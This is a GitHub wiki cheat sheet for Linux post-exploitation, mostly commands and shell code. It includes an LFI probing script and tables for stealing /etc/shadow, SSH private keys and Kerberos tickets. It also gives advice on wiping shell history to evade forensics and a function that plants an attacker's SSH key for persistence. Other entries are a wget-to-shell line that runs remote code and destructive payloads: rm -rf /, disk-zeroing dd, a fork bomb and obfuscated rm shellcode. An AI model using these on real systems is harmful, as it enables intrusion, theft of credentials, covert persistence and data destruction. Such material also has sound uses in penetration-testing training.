post exploit linux - dvanmosselbeen/security-cheat-sheet GitHub Wiki
Things to pull when all you can do is blindly read files, as in LFI / directory traversal (Local File Inclusion). Don't forget to try a trailing %00: the null byte truncates a suffix the application appends (such as `.php`), but only on old interpreters (PHP before 5.3.4), so also try the path without it.
A nice training room for this can be the TryHackMe Inclusion room https://tryhackme.com/room/inclusion
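Added example (not part of the original wiki): a small helper that enumerates the traversal depth for one of the files listed below, with and without the trailing null byte, and optionally probes each candidate with curl. The base URL and the `page=` parameter are assumptions; the `root:` marker used to recognise a hit is specific to /etc/passwd.

```shell
#!/bin/sh
# lfi_urls BASE FILE [MAXDEPTH]
#   Print candidate URLs for FILE (no leading slash) behind BASE, adding one
#   "../" per depth step. Each depth is emitted twice: plain, and with %00.
lfi_urls() {
    base="$1"               # e.g. http://target/index.php?page=   (assumed)
    file="$2"               # e.g. etc/passwd
    maxdepth="${3:-6}"      # how many "../" to try at most
    depth=0
    prefix=""
    while [ "$depth" -le "$maxdepth" ]; do
        printf '%s%s%s\n' "$base" "$prefix" "$file"
        printf '%s%s%s%%00\n' "$base" "$prefix" "$file"   # %%00 -> literal %00
        prefix="${prefix}../"
        depth=$((depth + 1))
    done
}

# lfi_probe BASE FILE [MAXDEPTH]
#   Fetch each candidate and stop at the first response that looks like a
#   real /etc/passwd (a line starting with "root:"). Needs curl and a target;
#   nothing here is contacted when only lfi_urls is used.
lfi_probe() {
    command -v curl >/dev/null 2>&1 || { echo "curl not found" >&2; return 1; }
    lfi_urls "$@" | while read -r url; do
        if curl -s "$url" | grep -q '^root:'; then
            printf 'HIT %s\n' "$url"
            break
        fi
    done
}
```

Once a depth works for /etc/passwd, reuse it for the other files in the table (resolv.conf, .bash_history) rather than enumerating again.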
File | Contents and Reason |
---|---|
/etc/resolv.conf | Current name servers (DNS) for the system. Globally readable, and less likely to trigger IDS alerts than /etc/passwd |
/etc/motd | Message of the Day |
/etc/issue | Current distro version (login banner; often customized) |
/etc/passwd | List of local users |
/etc/shadow | Users' password hashes (requires root; if an LFI returns it, the web server itself runs as root) |
/home/xxx/.bash_history | Gives you directory and command context |
Command | Description and/or Reason |
---|---|
uname -a | Prints the kernel version, arch, sometimes distro |
ps aux | List all running processes |
top -b -n 1 | One batch-mode snapshot of the process list (-n is the number of iterations, not lines; -d sets the delay between them) |
id | Your current username, uid and groups |
arch , uname -m | Kernel processor architecture |
w | Who is connected, uptime and load average |
who -a | Uptime, runlevel, ttys, processes etc. |
df -k | Mounted filesystems, size, % used, device and mount point |
mount | Mounted filesystems and their options (look for nosuid, noexec, ro) |
last -a | Last users logged on (from /var/log/wtmp) |
lastb | Failed login attempts (from /var/log/btmp); requires root |
lastcomm | Not installed by default: GNU accounting utilities for process and login accounting |
lastlog | Show when each user last logged in |
lastlogin | Same, on BSD systems |
getenforce | Status of SELinux (Enforcing, Permissive or Disabled) |
dmesg | Kernel messages since the last boot (unprivileged access may be blocked by kernel.dmesg_restrict) |
lspci | Prints all PCI buses and devices |
lsusb | Prints all USB buses and devices |
lscpu | Prints CPU information |
lshw | Lists hardware information (full output usually requires root) |
cat /proc/cpuinfo | CPU details without extra tools |
cat /proc/meminfo | Memory details without extra tools |
du -h --max-depth=1 / | Disk usage per top-level directory; note: can cause heavy disk I/O |
which nmap | Locate a command (i.e. nmap or nc) in PATH |
locate bin/nmap | Same via the locate database (may be stale; see updatedb) |
locate bin/nc | Same for netcat |
jps -l | Lists running JVMs with their main class or jar (JDK tool; handy for spotting Java services) |
Command | Description and/or Reason |
---|---|
hostname -f | Long host name (FQDN) |
ip addr | Show IP information |
ip route | Show IP routes |
ifconfig -a | Legacy (net-tools) equivalent of ip addr; may not be installed |
route -n | Legacy routing table |
cat /etc/network/interfaces | Debian-style static network configuration |
iptables -L -n -v | Filter table rules with counters (requires root) |
iptables -t nat -L -n -v | NAT rules |
ip6tables -L -n -v | IPv6 rules |
iptables-save | Dump all tables in loadable form |
netstat -anop | All sockets, numeric, with owning process and timers |
netstat -r | Routing table |
netstat -nltupw | Listening TCP/UDP/raw sockets with owning process; raw sockets and other users' processes are only shown as root |
ss -tulpn | Modern (iproute2) replacement for netstat |
arp -a | ARP table with IP info (ip neigh on iproute2-only systems) |
lsof -nPi | Open network sockets per process |
cat /proc/net/* | More discreet: everything the commands above show is derived from the files under /proc/net (tcp, udp, arp, route, ...), and reading them is less likely to trigger monitoring of tool execution. Addresses and ports are stored as hex and need decoding |
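Added example (not part of the original wiki): decoding /proc/net/tcp by hand, since reading it avoids running netstat or ss but the columns are not human-readable. Local and remote addresses are little-endian hex IPv4 plus big-endian hex port, and the state is a hex code (0A = LISTEN, 01 = ESTABLISHED). The function takes an alternative file path so it can be run against a copy pulled off a target; the sample file in the test is constructed.

```shell
#!/bin/sh
# decode_proc_net_tcp [FILE]
#   Print "STATE LOCAL REMOTE uid=N" for every entry in FILE (default
#   /proc/net/tcp). Pure awk, so it works on a minimal box without net-tools.
decode_proc_net_tcp() {
    awk '
    # "0016" -> 22, without relying on gawk-only strtonum()
    function hex2dec(h,    i, n) {
        n = 0; h = toupper(h)
        for (i = 1; i <= length(h); i++)
            n = n * 16 + index("0123456789ABCDEF", substr(h, i, 1)) - 1
        return n
    }
    # "0100007F" -> 127.0.0.1: the four bytes are stored in reverse order
    function ip4(h) {
        return hex2dec(substr(h, 7, 2)) "." hex2dec(substr(h, 5, 2)) "." \
               hex2dec(substr(h, 3, 2)) "." hex2dec(substr(h, 1, 2))
    }
    # "0100007F:0016" -> "127.0.0.1:22"
    function addr(a,    p) {
        split(a, p, ":")
        return ip4(p[1]) ":" hex2dec(p[2])
    }
    BEGIN {
        st["01"] = "ESTABLISHED"; st["02"] = "SYN_SENT";   st["03"] = "SYN_RECV"
        st["04"] = "FIN_WAIT1";   st["05"] = "FIN_WAIT2";  st["06"] = "TIME_WAIT"
        st["07"] = "CLOSE";       st["08"] = "CLOSE_WAIT"; st["09"] = "LAST_ACK"
        st["0A"] = "LISTEN";      st["0B"] = "CLOSING"
    }
    # skip the header line; fields: sl local rem st txq:rxq tr:when retrnsmt uid ...
    NR > 1 {
        state = ($4 in st) ? st[$4] : $4
        printf "%-12s %-21s %-21s uid=%s\n", state, addr($2), addr($3), $8
    }' "${1:-/proc/net/tcp}"
}
```

The uid column tells you which account owns each socket, which is what `netstat -p` needs root for; /proc/net/udp has the same layout, and the IPv6 files (/proc/net/tcp6) use 32 hex characters per address.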
Command | Description and/or Reason |
---|---|
cat /etc/passwd | Local accounts |
cat /etc/shadow | Password hashes on Linux (requires root) |
cat /etc/security/passwd | Password hashes on AIX |
cat /etc/group | Groups (or /etc/gshadow for group passwords) |
getent passwd | Dumps all accounts: local, LDAP, NIS, whatever the system (NSS) is using |
getent group | Same for groups |
pdbedit -L -w | Samba's own user database, with the NT hashes (requires root) |
pdbedit -L -v | Same, verbose |
cat /etc/aliases | Mail aliases |
find /etc -name aliases | Locate the aliases file if it is somewhere else |
getent aliases | Mail aliases via NSS |
ypcat passwd | Displays the NIS password map |
Command | Description and/or Reason |
---|---|
ls -alh /home/*/ | Home directories, dotfiles and their permissions |
ls -alh /home/*/.ssh/ | SSH files, hopefully private keys |
cat /home/*/.ssh/authorized_keys | SSH authorized keys (who can log in as whom) |
cat /home/*/.ssh/known_hosts | SSH known hosts (where this user connects to; entries may be hashed) |
cat /home/\*/.*hist* | Shell history files, you can learn a lot from these |
grep ^ssh /home/*/.*hist* | SSH commands in history: hosts, users, key paths |
grep ^telnet /home/*/.*hist* | Telnet sessions |
grep ^mysql /home/*/.*hist* | MySQL logins, sometimes with -p passwords on the command line |
find /home/\*/.vnc /home/\*/.subversion -type f | VNC password files and stored Subversion credentials |
cat /home/*/.viminfo | Recently edited files and vim command/search history |
sudo -l | If sudoers is not readable, this often works per user: lists what the current user may run via sudo |
crontab -l | Current user's cron jobs |
getcap -r / 2>/dev/null | Lists files that have file capabilities set (e.g. cap_setuid on a binary), a privilege-escalation path comparable to SUID. The tool comes with libcap and is not installed on every box. See man capabilities |
cat /home/*/.mysql_history | MySQL client history: queries, sometimes credentials |
sudo -p | Lets the caller define the password prompt text; useful for customization with aliases or shell scripts |
File/Folder | Description and/or Reason |
---|---|
/home/\*/.ssh/id* | SSH private keys, often without passphrase |
/tmp/krb5cc_* | Kerberos credential caches (tickets) |
/tmp/krb5.keytab | Kerberos keytab: long-term keys rather than tickets (the usual location is /etc/krb5.keytab) |
/home/*/.gnupg/secring.gpg | PGP secret keyring (GnuPG before 2.1; newer versions keep private keys under .gnupg/private-keys-v1.d/) |
Command | Description and/or Reason |
---|---|
ls -aRl /etc/ \| awk '$1 ~ /w.$/' \| grep -v lrwx 2>/dev/null | World-writable entries under /etc (symlinks filtered out) |
cat /etc/issue{,.net} | Login banners (local and network) |
cat /etc/master.passwd | BSD password hashes (requires root) |
cat /etc/group | Groups |
cat /etc/hosts | Static host entries, hints at other systems |
cat /etc/crontab | System-wide cron table |
cat /etc/sysctl.conf | Kernel parameters |
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l 2>/dev/null; done | Lists all users' crontabs (reading other users' needs root) |
cat /etc/resolv.conf | DNS servers and search domains |
cat /etc/syslog.conf | Where logs go (also /etc/rsyslog.conf) |
cat /etc/chttp.conf | |
cat /etc/lighttpd.conf | lighttpd web server config |
cat /etc/cups/cupsd.conf | CUPS print server config |
cat /etc/inetd.conf | inetd-managed services |
cat /opt/lampp/etc/httpd.conf | XAMPP Apache config |
cat /etc/samba/smb.conf | Samba shares and auth settings |
cat /etc/openldap/ldap.conf | LDAP client config |
cat /etc/ldap/ldap.conf | LDAP client config (Debian path) |
cat /etc/exports | NFS exports (look for no_root_squash) |
cat /etc/auto.master | Automounter maps |
cat /etc/auto_master | Automounter maps (Solaris/BSD naming) |
cat /etc/fstab | Filesystems to mount; CIFS/NFS entries may carry credentials or a credentials= file path |
find /etc/sysconfig/ -type f -exec cat {} \; | Red Hat style service configuration |
File or command | Description and/or Reason |
---|---|
uname -a | Often hints at it pretty well |
lsb_release -d | Generic command for all LSB distros |
/etc/os-release | Generic for distros using systemd (and most current distros) |
/etc/issue | Generic but often modified |
cat /etc/*release | Catch-all for the per-distro files below |
/etc/SUSE-release | Novell SUSE |
/etc/redhat-release, /etc/redhat_version | Red Hat |
/etc/fedora-release | Fedora |
/etc/slackware-release, /etc/slackware-version | Slackware |
/etc/debian_release, /etc/debian_version | Debian |
/etc/mandrake-release | Mandrake |
/etc/sun-release | Sun JDS |
/etc/release | Solaris/Sparc |
/etc/gentoo-release | Gentoo |
/etc/arch-release | Arch Linux (file will be empty) |
arch | OpenBSD; sample: "OpenBSD.amd64" |
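Added example (not part of the original wiki): the lookup order from the table above as one function, trying the generic sources first and the per-distro legacy files last. It takes an optional root prefix so it also works against a mounted image or a copy of /etc pulled over LFI; the os-release content in the test is constructed.

```shell
#!/bin/sh
# detect_distro [ROOT]
#   Print a one-line distro identification. ROOT is prefixed to every path
#   (default: the live system). Returns 1 if only the kernel string was found.
detect_distro() {
    root="${1:-}"
    # 1. /etc/os-release: PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
    if [ -r "$root/etc/os-release" ]; then
        name=$(sed -n 's/^PRETTY_NAME=//p' "$root/etc/os-release" | tr -d '"')
        [ -n "$name" ] && { printf '%s\n' "$name"; return 0; }
    fi
    # 2. lsb_release only makes sense on the live system, not a mounted copy
    if [ -z "$root" ] && command -v lsb_release >/dev/null 2>&1; then
        lsb_release -sd | tr -d '"'
        return 0
    fi
    # 3. legacy per-distro files; the file name itself identifies the distro
    for f in SUSE-release redhat-release fedora-release slackware-version \
             debian_version mandrake-release sun-release release \
             gentoo-release arch-release; do
        if [ -r "$root/etc/$f" ]; then
            if [ -s "$root/etc/$f" ]; then
                printf '%s (%s)\n' "$(head -n 1 "$root/etc/$f")" "$f"
            else
                printf '%s (empty file)\n' "$f"    # Arch: /etc/arch-release is empty
            fi
            return 0
        fi
    done
    # 4. last resort: the kernel build string often names the distro
    uname -a
    return 1
}
```

`/etc/issue` is deliberately not consulted: it is a banner that admins rewrite, so it is the least reliable of the sources listed.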
Command | Description and/or Reason |
---|---|
rpm -qa --last \| head | RPM-based: most recently installed packages first |
yum list \| grep installed | RPM-based, via yum |
dpkg -l | Debian |
dpkg --get-selections | Debian |
pkg_info | {Free,Net}BSD |
pkginfo | Solaris |
cd /var/db/pkg/ && ls -d */* | Gentoo |
pacman -Q | Arch Linux |
Command | Description and/or Reason |
---|---|
cat /etc/apt/sources.list | Debian (also the files under /etc/apt/sources.list.d/) |
ls -l /etc/yum.repos.d/ | Red Hat / Fedora repositories |
cat /etc/yum.conf | yum configuration, may include proxy settings |
Command | Description and/or Reason |
---|---|
grep -rnw '/path/to/somewhere/' -e 'some-word-you-search' | Search recursively for some-word-you-search as a whole word |
ls -dlR */ | Directory tree with permissions |
find /var -type d | All directories under /var |
find /var ! -user root -type d -ls | Directories under /var not owned by root |
find /var/log -type f -exec ls -la {} \; | All log files with their permissions |
find / -perm -u=s -type f 2>/dev/null | Find all SUID files |
find / -perm /6000 -type f 2>/dev/null | Find all SUID or SGID files (the older -perm +6000 spelling is no longer accepted by current GNU find) |
find / -perm -4000 2>/dev/null | Find all SUID files |
find / -user root -perm /4000 2>/dev/null | Find SUID files owned by root |
ls -alhtr /mnt | Recently changed entries under /mnt (mounted shares) |
ls -alhtr /media | Same for removable media |
ls -alhtr /tmp | Temp files by modification time: scripts, sockets, other users' leftovers |
ls -alhtr /home | Home directories by modification time |
tree /home/*/.ssh/ | SSH files of every user at a glance |
find /home -type f -iname '.*history' | All history files |
ls -lart /etc/rc.d/ | Init scripts (BSD / older Red Hat) |
ls /home/*/.ssh/id* | SSH private keys |
locate rhosts | Old rsh trust files (.rhosts) |
Other commands below could not be put into the Markdown table because of the pipes in them. Arf, Markdown syntax has its limits.

```sh
ls -alR | grep ^d
ls -dl `find /var -type d`
ls -dl `find /var -type d` | grep -v root
# Remember to run updatedb before running locate
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
# java config files
locate .properties | grep [.]properties$
# java/.net config files
locate .xml | grep [.]xml$
# find suids (and sgids) in the usual binary directories plus everything on PATH
find /sbin /usr/sbin /opt /lib $(echo $PATH | sed 's/:/ /g') -perm /6000 -ls
```
Also, check http://incolumitas.com/uploads/2012/12/blackhats_view.pdf for some one-liners that find world writable directories/files and more.
Command | Description and/or Reason |
---|---|
sort | Sort a text file. |
export HISTFILE= | Stop the current bash session from writing its history file on exit |
unset HISTFILE | Same effect |
- Putting a space in front of a command keeps it out of the bash history, provided HISTCONTROL contains ignorespace or ignoreboth (the default on many distros, but not all).
This next one might not be a good idea, because a lot of folks know to check for tampering with this file and will be suspicious if they find out.
However, if you happen to be on an account that was originally inaccessible and its .bash_history file is available (ls -a ~), viewing its contents can give you a good deal of information about the system and its most recent updates/changes.
Command | Description and/or Reason |
---|---|
history -c | Clear the history held in memory by the current shell |
rm -rf ~/.bash_history && ln -s /dev/null ~/.bash_history | Invasive: replaces the history file with a symlink to /dev/null (note the argument order: target first, link name second) |
touch ~/.bash_history | Invasive |
<space> history -c | Using a space before the command (needs HISTCONTROL=ignorespace) |
zsh% unset HISTFILE HISTSIZE | zsh |
tcsh% set history=0 | tcsh |
bash$ set +o history | bash: stop recording for this session |
ksh$ unset HISTFILE | ksh |
find / -type f -exec {} \; | Forensics nightmare (incomplete in the original; as written it attempts to execute every file on the system) |
Note that you're probably better off modifying or temporarily disabling history rather than deleting the files: it leaves fewer traces and is less suspicious.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$'ing the shell so it never writes the file. Sometimes the shell is configured to run 'history -w' after every command (via PROMPT_COMMAND); get around this by overriding 'history' with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, or if auditd is recording execve calls.
Do not tell me you are that kind of bitch!
Only if it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into trouble.
Oh, and you're probably a jerk if you use any of the stuff below.
Command | Description and/or Reason |
---|---|
rm -rf / | Recursively tries to delete every file (current GNU coreutils refuses the bare root unless --no-preserve-root is given) |
mkfs.ext3 /dev/sda | Reformats the device, making recovery of files hard |
dd if=/dev/zero of=/dev/sda bs=1M | Overwrites disk /dev/sda with zeros |
- "Hex version of rm -rf /". This one circulates without explanation, so here is how it works: the bytes are 32-bit x86 shellcode, and the `section(".text")` attribute places the array in the executable code section. When control reaches it (for example through a function-pointer cast), it builds the string "rm -rf ~ / &" on the stack from four NOT-encoded dwords (so the command is not visible in the bytes), then calls execve("/bin/sh", ["/bin/sh", "-c", "rm -rf ~ / &"]) via int 0x80 and exits if that fails. The trailing "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;" text is part of the same string literal but is never referenced by the code: it is a decoy that makes the snippet look like a SUID-shell trick. Do not compile or run it.

```c
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ =
    "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
```
- Fork Bomb: the [in]famous "fork bomb". It defines a function named `:` that pipes into itself and backgrounds the copy, then calls it, so the number of processes doubles until the process table or memory is exhausted and the system "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb; a per-user process limit (ulimit -u) is what stops it. Read more here: https://en.wikipedia.org/wiki/Fork_bomb

```sh
:(){ :|:& };:
```
See the great linPEAS tool!: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Command | Description and/or Reason |
---|---|
sudo -l | What the current user is allowed to run as root (or as other users). See also GTFOBins |
ls -alh /root/ | Root's home, if readable |
cat /etc/sudoers | sudo policy (usually root-only; also check /etc/sudoers.d/) |
cat /etc/shadow | Password hashes, if readable |
cat /etc/master.passwd # OpenBSD | BSD password hashes |
cat /var/spool/cron/crontabs/* | Per-user crontabs (Debian path) |
cat /var/spool/cron/* | Per-user crontabs (Red Hat path) |
lsof -nPi | Listening services that may be reachable only locally |
ls /home/\*/.ssh/* | SSH keys of other users |
cat /etc/crontab | Looking for cron jobs (writable scripts run by root are a classic) |
find / -user root -perm -4000 -print 2>/dev/null | SUID root binaries; check each against GTFOBins |
Also by creating a user account can be interesting.
To make things even better, you should always try and get shell access to the box. Ideally with an SSH
connection to have full shell access instead of not so stable or limited reverse or bind shells.
id_rsa is the file that contains a private key that can be used to connect to a box via ssh. It is usually located in the .ssh folder in the user's home directory (full path: /home/USER/.ssh/id_rsa; newer systems often use id_ed25519 instead). Get that file onto your system, restrict it to your user (chmod 600 id_rsa; ssh refuses a key file that is group- or world-readable) and connect from your machine with ssh -i id_rsa USER@IP.

If the target box does not have a generated id_rsa file (or you simply don't have read permission on it), you can still gain stable ssh access: generate your own key pair on your system and add the public half to the authorized_keys file on the target.

Run ssh-keygen and id_rsa and id_rsa.pub appear in your own .ssh folder. Copy the content of id_rsa.pub into the authorized_keys file on the target (in the user's .ssh folder). If authorized_keys does not exist there, create it and chmod 600 authorized_keys; the .ssh directory itself must be 700 and the home directory not group-writable, otherwise sshd's StrictModes ignores the file. After that, connect with ssh -i id_rsa USER@IP and you won't be asked for a password. Note that this leaves a trace: your key is sitting in their file.

NOTE: If the target machine does not have ssh config files at all, just create them as described above.
NOTE: The ssh server also needs to allow all this (PubkeyAuthentication enabled, and the user not excluded by AllowUsers/DenyUsers).
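Added example (not part of the original wiki): the authorized_keys step above as a function that creates the files with the permissions StrictModes requires and does not add the same key twice. The key line is passed in as a string; the key material in the test is constructed and not a real key, and the home directory is whatever you point it at.

```shell
#!/bin/sh
# install_authorized_key HOME PUBKEY_LINE
#   Append PUBKEY_LINE (one line as found in id_rsa.pub / id_ed25519.pub) to
#   HOME/.ssh/authorized_keys, creating .ssh (0700) and the file (0600) if
#   needed. Prints "installed" or "already present".
install_authorized_key() {
    home="$1"
    pubkey="$2"
    sshdir="$home/.ssh"
    authfile="$sshdir/authorized_keys"
    [ -d "$sshdir" ] || mkdir -p "$sshdir" || return 1
    chmod 700 "$sshdir"                    # StrictModes rejects a looser .ssh
    [ -f "$authfile" ] || : > "$authfile"
    chmod 600 "$authfile"
    # Compare on the key material (2nd field) so a different comment on the
    # same key does not produce a duplicate line.
    keydata=$(printf '%s\n' "$pubkey" | awk '{print $2}')
    if awk -v k="$keydata" '$2 == k { found = 1 } END { exit !found }' "$authfile"; then
        echo "already present"
        return 0
    fi
    printf '%s\n' "$pubkey" >> "$authfile"
    echo "installed"
}

# count_authorized_keys HOME
#   Number of key lines now authorized; a quick sanity check that the
#   existing file was appended to rather than clobbered. Prints 0 if absent.
count_authorized_keys() {
    awk '/^(ssh-|ecdsa-)/ { n++ } END { print n + 0 }' "$1/.ssh/authorized_keys" 2>/dev/null || echo 0
}
```

Afterwards `ssh -i id_rsa USER@IP` logs in without a password, assuming sshd permits public-key authentication for that user.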
See the dedicated document: Reverse Shell
wget http://server/file.sh -O- | sh
Downloads the file and pipes it straight into a shell, so it runs without ever touching disk. Whatever the server returns (including an error page or a truncated download) is executed as-is.
- GTFOBins: a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.